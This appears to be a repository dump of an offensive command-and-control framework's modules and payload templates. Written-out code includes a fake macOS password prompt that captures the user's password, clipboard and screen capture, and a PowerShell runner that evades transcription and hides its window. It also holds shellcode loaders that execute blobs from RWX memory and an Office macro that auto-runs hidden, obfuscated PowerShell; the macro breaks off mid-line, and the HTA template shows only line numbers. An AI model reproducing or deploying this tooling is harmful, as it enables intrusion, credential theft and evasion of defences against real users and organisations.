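-------------------------------------------------------------------------------- /resources/modules/SafetyDump.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SafetyDump.exe -------------------------------------------------------------------------------- /resources/modules/SafetyKatz.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SafetyKatz.exe -------------------------------------------------------------------------------- /resources/modules/SchTasks.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SchTasks.exe -------------------------------------------------------------------------------- /resources/modules/Screenshot.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/Screenshot.dll -------------------------------------------------------------------------------- /resources/modules/Screenshot.ps1: --------------------------------------------------------------------------------
Function Get-Screenshot
{
    <#
    .SYNOPSIS
    Capture the whole virtual screen as a PNG.

    .DESCRIPTION
    Copies the virtual screen (all monitors) into a bitmap. With -File the
    PNG is written to that path and $null is returned; otherwise the PNG
    bytes are returned as a Base64 string. The GDI+ objects are disposed on
    every path, including when CopyFromScreen or Save throws.

    .PARAMETER File
    Optional path to write the PNG to.

    .OUTPUTS
    Base64 string of the PNG when -File is not given; $null otherwise.
    #>
    param($File)
    Add-Type -AssemblyName System.Windows.Forms
    Add-type -AssemblyName System.Drawing
    $Screen = [System.Windows.Forms.SystemInformation]::VirtualScreen
    $Width = $Screen.Width
    $Height = $Screen.Height
    $Left = $Screen.Left
    $Top = $Screen.Top
    # Initialised explicitly so the -File branch returns $null instead of
    # reading a variable that was never assigned.
    $b64 = $null
    $bitmap = New-Object System.Drawing.Bitmap $Width, $Height
    $graphic = [System.Drawing.Graphics]::FromImage($bitmap)
    $msimage = New-Object IO.MemoryStream
    try {
        $graphic.CopyFromScreen($Left, $Top, 0, 0, $bitmap.Size)
        if ($File) {
            $bitmap.save($file, "png")
        } else {
            $bitmap.save($msimage, "png")
            $b64 = [Convert]::ToBase64String($msimage.toarray())
        }
    } finally {
        # Bitmap and Graphics wrap unmanaged GDI handles; release them
        # deterministically rather than waiting for the finalizer.
        $graphic.Dispose()
        $bitmap.Dispose()
        $msimage.Dispose()
    }
    return $b64
}
-------------------------------------------------------------------------------- /resources/modules/Seatbelt.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/Seatbelt.exe -------------------------------------------------------------------------------- /resources/modules/SharPersist.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SharPersist.exe -------------------------------------------------------------------------------- /resources/modules/SharpApplocker.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SharpApplocker.exe -------------------------------------------------------------------------------- /resources/modules/SharpCOM.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SharpCOM.exe -------------------------------------------------------------------------------- /resources/modules/SharpChrome.exe: --------------------------------------------------------------------------------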
https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SharpChrome.exe -------------------------------------------------------------------------------- /resources/modules/SharpChromium.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SharpChromium.exe -------------------------------------------------------------------------------- /resources/modules/SharpCookieMonster.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SharpCookieMonster.exe -------------------------------------------------------------------------------- /resources/modules/SharpCreateProc.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SharpCreateProc.exe -------------------------------------------------------------------------------- /resources/modules/SharpDPAPI.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SharpDPAPI.exe -------------------------------------------------------------------------------- /resources/modules/SharpDump.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SharpDump.exe -------------------------------------------------------------------------------- /resources/modules/SharpEDRChecker.exe: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SharpEDRChecker.exe -------------------------------------------------------------------------------- /resources/modules/SharpEdge.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SharpEdge.exe -------------------------------------------------------------------------------- /resources/modules/SharpFTP.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SharpFTP.exe -------------------------------------------------------------------------------- /resources/modules/SharpHound.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SharpHound.exe -------------------------------------------------------------------------------- /resources/modules/SharpLogger.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SharpLogger.exe -------------------------------------------------------------------------------- /resources/modules/SharpPrintNightmare.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SharpPrintNightmare.exe -------------------------------------------------------------------------------- /resources/modules/SharpPrinter.exe: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SharpPrinter.exe -------------------------------------------------------------------------------- /resources/modules/SharpProcessList.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SharpProcessList.exe -------------------------------------------------------------------------------- /resources/modules/SharpReg.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SharpReg.exe -------------------------------------------------------------------------------- /resources/modules/SharpRoast.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SharpRoast.exe -------------------------------------------------------------------------------- /resources/modules/SharpSC.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SharpSC.exe -------------------------------------------------------------------------------- /resources/modules/SharpSC2.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SharpSC2.exe -------------------------------------------------------------------------------- /resources/modules/SharpSSDP.exe: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SharpSSDP.exe -------------------------------------------------------------------------------- /resources/modules/SharpService.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SharpService.exe -------------------------------------------------------------------------------- /resources/modules/SharpShadowCopy.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SharpShadowCopy.exe -------------------------------------------------------------------------------- /resources/modules/SharpShares.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SharpShares.exe -------------------------------------------------------------------------------- /resources/modules/SharpSniper.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SharpSniper.exe -------------------------------------------------------------------------------- /resources/modules/SharpSocksImplant.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SharpSocksImplant.exe -------------------------------------------------------------------------------- /resources/modules/SharpSploit.dll: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SharpSploit.dll -------------------------------------------------------------------------------- /resources/modules/SharpTask.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SharpTask.exe -------------------------------------------------------------------------------- /resources/modules/SharpTelnet.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SharpTelnet.exe -------------------------------------------------------------------------------- /resources/modules/SharpUp.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SharpUp.exe -------------------------------------------------------------------------------- /resources/modules/SharpView.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SharpView.exe -------------------------------------------------------------------------------- /resources/modules/SharpWMI.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SharpWMI.exe -------------------------------------------------------------------------------- /resources/modules/SharpWSUS.exe: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SharpWSUS.exe -------------------------------------------------------------------------------- /resources/modules/SharpWeb.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SharpWeb.exe -------------------------------------------------------------------------------- /resources/modules/Shhmon.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/Shhmon.exe -------------------------------------------------------------------------------- /resources/modules/Sitrep.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/Sitrep.exe -------------------------------------------------------------------------------- /resources/modules/Stage2-Core.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/Stage2-Core.exe -------------------------------------------------------------------------------- /resources/modules/StandIn.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/StandIn.exe -------------------------------------------------------------------------------- /resources/modules/Steal_token.exe: -------------------------------------------------------------------------------- 
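https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/Steal_token.exe
--------------------------------------------------------------------------------
/resources/modules/StickyNotesExtract.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/StickyNotesExtract.exe
--------------------------------------------------------------------------------
/resources/modules/SweetPotato.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SweetPotato.exe
--------------------------------------------------------------------------------
/resources/modules/SyscallsExtractor.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SyscallsExtractor.exe
--------------------------------------------------------------------------------
/resources/modules/Test-ADCredential.ps1:
--------------------------------------------------------------------------------
Function Test-ADCredential
{
    <#
    .SYNOPSIS
    Checks a username/password pair against a domain and reports the result.

    .DESCRIPTION
    Uses PrincipalContext.ValidateCredentials from
    System.DirectoryServices.AccountManagement, which performs a real
    authentication attempt against the domain given in -domain.
    NOTE(review): a failed check is a genuine failed logon from the directory's
    point of view, so repeated calls against a real account can count towards
    lockout thresholds and will leave authentication events on the domain
    controller - use sparingly.

    .PARAMETER username
    Account name to test.
    .PARAMETER password
    Clear-text password to test. It is copied into the returned object, so the
    output contains the secret - treat logs/reports accordingly.
    .PARAMETER domain
    Domain (or domain controller) name handed to PrincipalContext.

    .OUTPUTS
    PSObject with Username, Password and IsValid; IsValid is the string
    "True"/"False" rather than a [bool] (kept for compatibility with callers
    that parse the text).
    #>
    Param($username, $password, $domain)
    Add-Type -AssemblyName System.DirectoryServices.AccountManagement
    $ct = [System.DirectoryServices.AccountManagement.ContextType]::Domain
    $pc = New-Object System.DirectoryServices.AccountManagement.PrincipalContext($ct, $domain)
    $object = New-Object PSObject | Select Username, Password, IsValid
    $object.Username = $username;
    $object.Password = $password;
    try
    {
        $object.IsValid = $pc.ValidateCredentials($username, $password).ToString();
    }
    finally
    {
        # PrincipalContext holds a directory connection; release it even if validation throws.
        $pc.Dispose()
    }
    return $object
}
--------------------------------------------------------------------------------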
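/resources/modules/TestProxy.ps1:
--------------------------------------------------------------------------------
<#
Fetches $url through an explicit HTTP proxy and emits the response body, i.e. a
quick "does this proxy let me out" check.

$url        - URL to download.
$proxy_url  - proxy address passed to System.Net.WebProxy. The second constructor
              argument is BypassOnLocal = $true, so local addresses skip the proxy.
$username / $password - optional proxy credentials. When $username is set the
              clear-text $password is wrapped in a PSCredential and attached to
              the proxy.
NOTE(review): whether the password crosses the wire protected depends on the
auth scheme the proxy negotiates (Basic is not protected). The User-Agent is a
fixed IE11-style string.
#>
function TestProxy ($url,$proxy_url,$username,$password) {
    $wc = New-Object System.Net.WebClient;
    $wp = New-Object System.Net.WebProxy($proxy_url,$true)
    $wc.Headers.Add("User-Agent","Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko")
    $wc.Proxy=$wp;
    if ($username) {
        $PSS = ConvertTo-SecureString $password -AsPlainText -Force;
        $getcreds = new-object system.management.automation.PSCredential $username,$PSS;
        $wp.Credentials = $getcreds;
    }
    try {
        $wc.downloadstring($url)
    }
    finally {
        # WebClient is IDisposable; release it even when the download throws.
        $wc.Dispose()
    }
}
--------------------------------------------------------------------------------
/resources/modules/WExec.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/WExec.exe
--------------------------------------------------------------------------------
/resources/modules/Watson.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/Watson.exe
--------------------------------------------------------------------------------
/resources/modules/clipboard.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/clipboard.exe
--------------------------------------------------------------------------------
/resources/modules/clipboard_monitor.js:
--------------------------------------------------------------------------------
// Polls the general pasteboard once per second for `runTime` iterations and
// returns every new string value seen, joined with commas (Array.toString, so a
// clipboard entry that itself contains a comma is ambiguous in the output).
// `count` starts at 0 while NSPasteboard.changeCount is typically already > 0,
// so the first iteration captures whatever is on the clipboard at start.
// NOTE(review): stringForType returns nil for non-text clipboard content; the
// bridged `.js` of that is pushed as-is - TODO confirm how it renders.
function clipRun(runTime){
    ObjC.import('AppKit');
    let cboard = [];
    let pb = $.NSPasteboard.generalPasteboard;
    let count = 0;
    for (let i = 0; i < runTime; i++){
        if (count < pb.changeCount){
            cboard.push(pb.stringForType("NSStringPboardType").js);
            count = pb.changeCount;
        }
        $.NSThread.sleepForTimeInterval(1);
    }
    return cboard.toString();
}
// %s is presumably filled in server-side (Python %-formatting) with the number
// of seconds to monitor - one sleep(1) per iteration.
let runTime = %s;
clipRun(runTime);
--------------------------------------------------------------------------------
/resources/modules/cred-popper.js:
--------------------------------------------------------------------------------
// Shows a password dialog (hidden answer) to the logged-in user and returns what
// they typed. title/text/icon are the script-level globals filled in from the
// %s placeholders at the bottom of the file.
// NOTE(review): if the user clicks Cancel, displayDialog throws ("User canceled")
// and the script aborts - nothing here handles that.
function prompter(title, text, icon){
    let app = Application.currentApplication()
    app.includeStandardAdditions = true
    let prompt = app.displayDialog(text, {defaultAnswer: "", buttons: ["OK", "Cancel"], defaultButton: "OK", cancelButton: "Cancel", withTitle: title, withIcon: Path(icon), hiddenAnswer: true });
    let pass = prompt.textReturned;
    // Verifying the typed password via CBIdentity does not work from macOS 11
    // (Big Sur) onward, so on those versions the value is returned unverified.
    // operatingSystemVersionString looks like "Version 11.2.3 (Build 20D91)";
    // take the first number as the major version. The previous substring test
    // (osVer.includes("11.")) also matched "10.11.x" and missed macOS 12+.
    let osVer = ObjC.deepUnwrap($.NSProcessInfo.processInfo.operatingSystemVersionString.js);
    let verMatch = osVer.match(/(\d+)\./);
    let majorVer = verMatch ? parseInt(verMatch[1], 10) : 0;
    if (majorVer >= 11){
        return pass;
    }else{
        // Propagate testPass's result; previously it was discarded and this
        // function returned undefined on the verified path.
        return testPass(pass);
    }
}
// Checks `pass` against the current user's account via the Collaboration
// framework. Returns the password when it authenticates; re-prompts (and returns
// that result) when it does not; returns undefined if the user lookup fails.
function testPass(pass){
    ObjC.import('Collaboration');
    ObjC.import('CoreServices');
    let cu = ObjC.deepUnwrap($.NSProcessInfo.processInfo.userName);
    let authority = $.CBIdentityAuthority.defaultIdentityAuthority;
    let username = cu;
    let password = pass;
    let user = $.CBIdentity.identityWithNameAuthority(username, authority);
    if(user.js !== undefined){
        if(user.authenticateWithPassword(password)){
            console.log("Successful authentication");
            return password;
        }
        else{
            // Wrong password: ask again and hand the eventual result back up.
            return prompter(title, text, icon);
        }
    }
    else{
        console.log("User does not exist");
    }
}

var title = "%s";
var text = "%s";
var icon = "%s";
prompter(title, text, icon)
--------------------------------------------------------------------------------
/resources/modules/dcom.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/dcom.exe
--------------------------------------------------------------------------------
/resources/modules/token.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/token.exe
--------------------------------------------------------------------------------
/resources/payload-templates/DynamicCode.cs:
--------------------------------------------------------------------------------
using System;
using System.IO;

namespace PoshC2DynamicCode {

    /// <summary>
    /// Template for the "dynamic code" feature: the operator replaces the body of
    /// Main with the C# to run. The default body only prints a marker line.
    /// </summary>
    public class Program
    {

        public static void Main(string[] args){
            // Code goes here, e.g:
            Console.WriteLine("Dynamic Code executed successfully");
        }

    }

}
--------------------------------------------------------------------------------
/resources/payload-templates/Sharp_Powershell_Runner.cs:
--------------------------------------------------------------------------------
using System;
using System.Text;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;

/// <summary>
/// Runs the base64 PowerShell script stored in <see cref="basepayload"/> (substituted
/// for #REPLACEME# at build time) inside an in-process runspace, i.e. without
/// powershell.exe. Two entry points: the parameterless constructor decodes the
/// payload as UTF-16LE, <see cref="Sharp"/>/<see cref="Main"/> decode it as UTF-8.
/// </summary>
public class Program
{
    [DllImport("kernel32.dll")] static extern IntPtr GetConsoleWindow();
    [DllImport("user32.dll")] static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);
    [DllImport("kernel32.dll")] static extern IntPtr GetCurrentThread();
    [DllImport("kernel32.dll")] static extern bool TerminateThread(IntPtr hThread, uint dwExitCode);

    public const int SW_HIDE = 0;
    public const int SW_SHOW = 5;
    public static string basepayload = "#REPLACEME#";
    public static IntPtr DllBaseAddress = IntPtr.Zero;

    /// <summary>
    /// Constructor entry point: decodes the payload as UTF-16LE and runs it. Any
    /// exception (including a decode failure) falls back to <see cref="Main"/>,
    /// which retries the payload as UTF-8.
    /// </summary>
    public Program() {
        try
        {
            string tt = System.Text.Encoding.Unicode.GetString(System.Convert.FromBase64String(basepayload));
            InvokeAutomation(tt);
        }
        catch
        {
            Main();
        }
    }

    /// <summary>
    /// Executes <paramref name="cmd"/> in a fresh runspace and returns its Out-String
    /// text. The script is passed through the runspace variable $c and invoked with
    /// IEX so the command text does not appear in the pipeline's own script
    /// ("transcript evasion").
    /// </summary>
    /// <remarks>
    /// The pipeline script assigns to $o instead of emitting output, so
    /// pipeline.Invoke() yields nothing; the output is therefore read back from $o
    /// after the run. Both callers in this file ignore the return value.
    /// </remarks>
    public static string InvokeAutomation(string cmd)
    {
        Runspace newrunspace = RunspaceFactory.CreateRunspace();
        newrunspace.Open();

        // transcript evasion
        var cmdin = new System.Management.Automation.PSVariable("c");
        newrunspace.SessionStateProxy.PSVariable.Set(cmdin);
        var output = new System.Management.Automation.PSVariable("o");
        newrunspace.SessionStateProxy.PSVariable.Set(output);

        Pipeline pipeline = newrunspace.CreatePipeline();
        newrunspace.SessionStateProxy.SetVariable("c", cmd);
        pipeline.Commands.AddScript("$o = IEX $c | Out-String");
        Collection<PSObject> results = pipeline.Invoke();
        // The assignment above produces no pipeline output; fetch $o explicitly.
        object captured = newrunspace.SessionStateProxy.GetVariable("o");
        newrunspace.Close();

        StringBuilder stringBuilder = new StringBuilder();
        foreach (PSObject obj in results)
        {
            stringBuilder.Append(obj);
        }
        if (captured != null)
        {
            stringBuilder.Append(captured);
        }
        return stringBuilder.ToString().Trim();
    }

    /// <summary>
    /// Exported-style entry point: hides the console window, runs the payload
    /// (UTF-8) with all exceptions swallowed, then terminates the current thread so
    /// control never returns to whoever invoked it. <paramref name="callbackFunc"/> is
    /// unused; <paramref name="baseAddress"/> is only stored in DllBaseAddress.
    /// </summary>
    public static void Sharp(long callbackFunc = 0, long baseAddress = 0)
    {
        DllBaseAddress = new IntPtr(baseAddress);
        var handle = GetConsoleWindow();
        ShowWindow(handle, SW_HIDE);
        try
        {
            string cmd = Encoding.UTF8.GetString(System.Convert.FromBase64String(basepayload));
            InvokeAutomation(cmd);
        }
        catch { }
        // Deliberate: end this thread in place rather than returning to the host.
        var x = GetCurrentThread();
        TerminateThread(x, 0);

    }
    public static void Main()
    {
        Sharp();
    }
}
--------------------------------------------------------------------------------
/resources/payload-templates/System.Management.Automation.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/payload-templates/System.Management.Automation.dll
--------------------------------------------------------------------------------
/resources/payload-templates/csc.cs:
--------------------------------------------------------------------------------
using System;
using System.Reflection;
using System.Diagnostics;
using System.Configuration.Install;
using System.Runtime.InteropServices;
using System.Threading;

/// <summary>
/// Self-injecting shellcode runner: picks the 32- or 64-bit blob (base64, substituted
/// for #REPLACEME32#/#REPLACEME64#), maps it into this process and runs it on a new
/// thread while the main thread blocks forever.
/// </summary>
class Program
{
    [Flags()]
    public enum AllocationType : uint
    {
        COMMIT = 0x1000,
        RESERVE = 0x2000,
        RESET = 0x80000,
        LARGE_PAGES = 0x20000000,
        PHYSICAL = 0x400000,
        TOP_DOWN = 0x100000,
        WRITE_WATCH = 0x200000
    }

    public enum Protection
    {
        PAGE_NOACCESS = 0x01,
        PAGE_READONLY = 0x02,
        PAGE_READWRITE = 0x04,
        PAGE_WRITECOPY = 0x08,
        PAGE_EXECUTE = 0x10,
        PAGE_EXECUTE_READ = 0x20,
        PAGE_EXECUTE_READWRITE = 0x40,
        PAGE_EXECUTE_WRITECOPY = 0x80,
        PAGE_GUARD = 0x100,
        PAGE_NOCACHE = 0x200,
        PAGE_WRITECOMBINE = 0x400
    }

    [DllImport("kernel32.dll", SetLastError=true)]
    static extern IntPtr VirtualAlloc(IntPtr lpAddress, IntPtr dwSize, AllocationType flAllocationType, Protection flProtect);

    [DllImport("Kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
    static extern IntPtr CreateThread(
        IntPtr lpThreadAttributes,
        uint dwStackSize,
        IntPtr lpStartAddress,
        IntPtr lpParameter,
        uint dwCreationFlags,
        out uint lpThreadId);

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern bool VirtualProtect(IntPtr lpAddress, IntPtr dwSize, Protection flNewProtect, out uint lpflOldProtect);

    static void Main(string[] args)
    {
        byte[] shell = null;

        string safdsv64 = "#REPLACEME64#";
        string safdsv32 = "#REPLACEME32#";

        // Select the blob matching this process's bitness.
        if (IntPtr.Size == 4)
        {
            // 32-bit sc
            shell = Convert.FromBase64String(safdsv32);
        }
        else if (IntPtr.Size == 8)
        {
            // 64-bit sc
            shell = Convert.FromBase64String(safdsv64);
        }
        if (shell == null || shell.Length == 0)
        {
            // Nothing to run (empty placeholder); the original would have failed the allocation.
            return;
        }

        // Allocate RW, copy, then flip to RWX rather than asking for RWX up front.
        // NOTE(review): the region is still RWX while it executes; PAGE_EXECUTE_READ
        // would do unless the shellcode writes to itself, which is not known here,
        // so RWX is kept. Twice the length leaves slack after the blob.
        IntPtr mem = VirtualAlloc(IntPtr.Zero, (IntPtr)(shell.Length*2), AllocationType.COMMIT, Protection.PAGE_READWRITE);

        if(mem != IntPtr.Zero)
        {
            uint oldProt = 0;
            uint threadId = 0;
            Marshal.Copy(shell, 0, mem, shell.Length);
            // If the protection change fails the page is not executable; starting a
            // thread on it would only fault, so bail out instead.
            if (!VirtualProtect(mem, (IntPtr)(shell.Length * 2), Protection.PAGE_EXECUTE_READWRITE, out oldProt))
            {
                return;
            }
            IntPtr hThread = CreateThread(IntPtr.Zero, 0, mem, IntPtr.Zero, 0, out threadId);
            if (hThread == IntPtr.Zero)
            {
                return;
            }
            // Block forever on an event nobody sets so the process (and the shellcode thread) stays alive.
            WaitHandle wh = new EventWaitHandle(false, EventResetMode.ManualReset);
            wh.WaitOne();
        }
    }

}
--------------------------------------------------------------------------------
/resources/payload-templates/dropper:
--------------------------------------------------------------------------------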
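https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/payload-templates/dropper
--------------------------------------------------------------------------------
/resources/payload-templates/dropper.c:
--------------------------------------------------------------------------------
#define WINVER 0x0501

#include <windows.h>
#include <stdlib.h>

#REPLACEME#

void pump(DWORD);

/*
 * Entry point: injects the shellcode array `sc` (emitted in place of
 * #REPLACEME# at payload-generation time) into the current process, then
 * parks the main thread forever so the process stays alive.
 */
int main(int argc, char *argv[])
{
    pump(GetCurrentProcessId());
    while(1) {Sleep(50000);}
    return 0;
}

/*
 * Allocates an RWX region in process dwProcessID (always our own PID here),
 * copies `sc` into it and starts a thread at its first byte.
 *
 * NOTE(review): a private RWX allocation plus CreateRemoteThread into the
 * same process is a well-known memory-scanner indicator; it is kept because
 * it is what the template does, not because it is quiet. Every failure path
 * exits the process, matching the rest of the file.
 */
void pump(DWORD dwProcessID) {
    HANDLE hProc;
    HANDLE hRemoteThread;
    PVOID pRemoteBuffer;

    if(!dwProcessID) {
        exit(0);
    }
    hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessID);
    if(!hProc) {
        exit(0);
    }
    /* sizeof(sc)*2: over-allocates to leave slack after the shellcode. */
    pRemoteBuffer = VirtualAllocEx(hProc, NULL, sizeof(sc)*2, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (!pRemoteBuffer) {
        exit(0);
    }
    if (!WriteProcessMemory(hProc, pRemoteBuffer, sc, sizeof(sc), NULL)) {
        exit(0);
    }
    hRemoteThread = CreateRemoteThread(hProc, NULL, 0, pRemoteBuffer, NULL, 0, NULL);
    if (!hRemoteThread) {
        exit(0);
    }
    /* The thread is never joined or signalled; drop the handle rather than leak it. */
    CloseHandle(hRemoteThread);
    CloseHandle(hProc);
}
--------------------------------------------------------------------------------
/resources/payload-templates/dropper.hta:
--------------------------------------------------------------------------------
1 | 2 | 3 | Microsoft HTA 4 | 5 | 6 | 7 | 8 | 9 | 10 | 16 | 17 | 18 | 19 | 23 | 28 | 29 | 40 |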
41 |
42 |
43 | 44 | 83 | 84 | 85 | 86 |
--------------------------------------------------------------------------------
/resources/payload-templates/dropper.macro:
--------------------------------------------------------------------------------
' Office auto-run entry points (Excel/Word, old and new names): every variant
' funnels into UpdateMacro.
Sub Auto_Open()
UpdateMacro
End Sub

Sub AutoOpen()
UpdateMacro
End Sub

Sub Workbook_Open()
UpdateMacro
End Sub

Sub WorkbookOpen()
UpdateMacro
End Sub

Sub Document_Open()
UpdateMacro
End Sub

Sub DocumentOpen()
UpdateMacro
End Sub

' Launches powershell.exe with the encoded command in `str` (assigned by the
' #REPLACEME# block). The executable name is assembled one character at a
' time - presumably so the literal "powershell.exe" never appears in the macro
' text. Flags: -exec bypass, non-interactive, hidden window, -e <base64>.
Sub UpdateMacro()
Dim str, exec

#REPLACEME#

exec = "p"
